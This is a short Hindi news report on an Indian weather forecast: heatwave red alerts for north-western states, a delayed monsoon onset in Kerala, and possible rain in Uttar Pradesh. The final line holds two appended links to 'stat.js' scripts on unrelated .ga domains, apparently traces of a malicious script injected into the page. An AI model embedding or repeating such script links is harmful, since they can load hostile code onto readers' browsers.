भारतीय मौसम विभाग ने दिल्ली, पंजाब, हरियाणा, चंडीगढ़ और राजस्थान के लिए ‘रेड अलर्ट’ जारी दी है. यह वार्निंग अगले दो दिन के लिए जारी की गई है. इसके अलावा, पूर्वी उत्तर प्रदेश के लिए ‘ऑरेंज’ वार्निंग दी गई है। इस बार केरल में मानसून के पहुंचने में देर होगी. मौसम विभाग के अनुसार इस बार मानसून के केरल तट तक पहुंचने में 5 जून तक का समय लग सकता है।
इसके अलावा मुंबई और कोलकाता में मानसून 10-11 जून तक पहुंचेगा. देश के अन्य भाग जैसे महाराष्ट्र, गुजरात, मध्य प्रदेश, छत्तीसगढ़, तेलंगाना, आंध्र प्रदेश, ओडिशा, झारखंड, बिहार और उत्तर प्रदेश में सप्ताह भर की देरी हो सकती है। बिहार के पूर्वी हिस्सों में एक-दो जगहों हल्की बारिश हो सकती है. उत्तर पश्चिम भारत और मध्य भारत के लगभग सभी भागों में मौसम शुष्क और बेहद गर्म बना रहेगा. राजस्थान, दिल्ली-एनसीआर, गुजरात के कुछ हिस्सों, मध्य प्रदेश, छत्तीसगढ़, तेलंगाना और आंध्र प्रदेश के कई हिस्सों में लू का प्रकोप जारी रहने की आशंका है।
यूपी में पश्चिमी विक्षोभ विकसित हो रहा है. दक्षिण-पूर्वी हवा भी चलने के आसार हैं. ऐसे में 28 मई को मौसम का मिजाज बदल भी सकता है. प्रदेश के कुछ स्थानों पर गरज-चमक के साथ बारिश भी हो सकती है. मई के अंतिम सप्ताह में भीषण गर्मी गड़ने के आसार हैं. तापमान 44 डिग्री भी पहुंच सकता है.https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms